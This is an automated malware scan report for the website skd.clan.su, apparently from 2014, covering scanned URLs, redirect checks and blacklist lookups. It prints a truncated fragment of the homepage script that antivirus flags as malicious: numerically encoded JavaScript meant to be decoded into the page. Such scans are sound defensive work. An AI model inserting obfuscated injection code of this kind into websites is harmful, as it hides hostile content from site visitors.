Scanned pages/files
Request | Server response | Status |
http://skd.clan.su/ | 200 OK Content-Length: 38911 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var temp="",i,c=0,out=""; var str="60!108!105!110!107!32!104!114!101!102!61!34!47!115!116!121!108!101!47!109!97!105!110!46!99!115!115!34!32!116!121!112!101!61!34!116!101!120!116!47!99!115!115!34!32!114!101!108!61!34!115!116!121!108!101!115!104!101!101!116!34!47!62!13!10!60!108!105!110!107!32!104!114!101!102!61!34!47!115!116!121!108!101!47!104!105!103!104!115!108!105!100!101!46!99!115!115!34!32!116!121!112!101!61!34!116!101!120!116!47!99!115!115!34!32!114!101!108!61!34!115!116!121!108!101!115!104 Antivirus reports:
| ||
http://s15.ucoz.net/src/jquery-1.7.2.js | 200 OK Content-Length: 94840 Content-Type: text/javascript | clean |
http://s15.ucoz.net/src/ulightbox/ulightbox.js | 200 OK Content-Length: 22097 Content-Type: text/javascript | clean |
http://s15.ucoz.net/src/uwnd.js?2 | 200 OK Content-Length: 228554 Content-Type: text/javascript | clean |
http://skd.clan.su/media/?t=video;w=250;h=200;f=http%3A%2F%2Fskd.clan.su%2Fparapa_180x180_4.swf | 200 OK Content-Length: 319 Content-Type: text/javascript | clean |
http://skd.clan.su/media/?t=video;w=250;h=350;f=http%3A%2F%2Fskd.clan.su%2Fsoundtrack2.swf | 200 OK Content-Length: 309 Content-Type: text/javascript | clean |
http://skd.clan.su/js/dropdowncontent.js | 200 OK Content-Length: 5536 Content-Type: text/javascript | clean |
http://counter.rambler.ru/top100.jcn?1876453 | 200 OK Content-Length: 6853 Content-Type: application/x-javascript | clean |
http://skd.clan.su/forum | 200 OK Content-Length: 42970 Content-Type: text/html | clean |
http://skd.clan.su/forum/0-0-1-34 | 200 OK Content-Length: 61745 Content-Type: text/html | clean |
http://skd.clan.su/forum/0-0-1-35 | 200 OK Content-Length: 22662 Content-Type: text/html | clean |
http://skd.clan.su/forum/0-0-0-36 | 200 OK Content-Length: 17027 Content-Type: text/html | clean |
http://skd.clan.su/forum/0-0-0-6 | 200 OK Content-Length: 15312 Content-Type: text/html | clean |
http://skd.clan.su/board/ | 503 Service Temporarily Unavailable Content-Length: 4509 Content-Type: text/html | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js | 200 OK Content-Length: 93100 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: skd.clan.su
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Cache-Control: no-store
Cache-Control: private
Connection: close
Date: Sun, 14 Dec 2014 06:59:39 GMT
Pragma: no-cache
Server: uServ/3.2.2
Content-Type: text/html; charset=UTF-8
Set-Cookie: 6skduCoz=; path=/; expires=Fri, 14-Dec-2012 06:59:39 GMT; domain=.skd.clan.su;
Set-Cookie: 6skduzll=1418540379; path=/; expires=Mon, 14-Dec-2015 06:59:39 GMT; domain=.skd.clan.su;
Set-Cookie: 6skduCoz=; path=/; expires=Fri, 14-Dec-2012 06:59:39 GMT; domain=.skd.clan.su;
Set-Cookie: 6skduCoz=; path=/; expires=Fri, 14-Dec-2012 06:59:39 GMT; domain=.skd.clan.su;
GET / HTTP/1.1
Host: skd.clan.su
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Cache-Control: no-store
Cache-Control: private
Connection: close
Date: Sun, 14 Dec 2014 06:59:39 GMT
Pragma: no-cache
Server: uServ/3.2.2
Content-Type: text/html; charset=UTF-8
Set-Cookie: 6skduCoz=; path=/; expires=Fri, 14-Dec-2012 06:59:39 GMT; domain=.skd.clan.su;
Set-Cookie: 6skduzll=1418540379; path=/; expires=Mon, 14-Dec-2015 06:59:39 GMT; domain=.skd.clan.su;
Set-Cookie: 6skduCoz=; path=/; expires=Fri, 14-Dec-2012 06:59:39 GMT; domain=.skd.clan.su;
Set-Cookie: 6skduCoz=; path=/; expires=Fri, 14-Dec-2012 06:59:39 GMT; domain=.skd.clan.su;
Second query (visit from search engine):
GET / HTTP/1.1
Host: skd.clan.su
Referer: http://www.google.com/search?q=skd.clan.su
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: skd.clan.su
Referer: http://www.google.com/search?q=skd.clan.su
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=skd.clan.su
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://skd.clan.su/
Result: skd.clan.su is not infected or malware details are not published yet.
Result: skd.clan.su is not infected or malware details are not published yet.